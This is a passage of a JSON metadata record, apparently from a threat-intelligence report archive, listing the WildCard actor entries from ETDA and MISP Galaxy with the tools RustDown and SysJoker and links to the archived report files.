			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438968,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9a69181f77341e01f90c7e194451bcc97779044.pdf",
		"text": "https://archive.orkl.eu/f9a69181f77341e01f90c7e194451bcc97779044.txt",
		"img": "https://archive.orkl.eu/f9a69181f77341e01f90c7e194451bcc97779044.jpg"
	}
}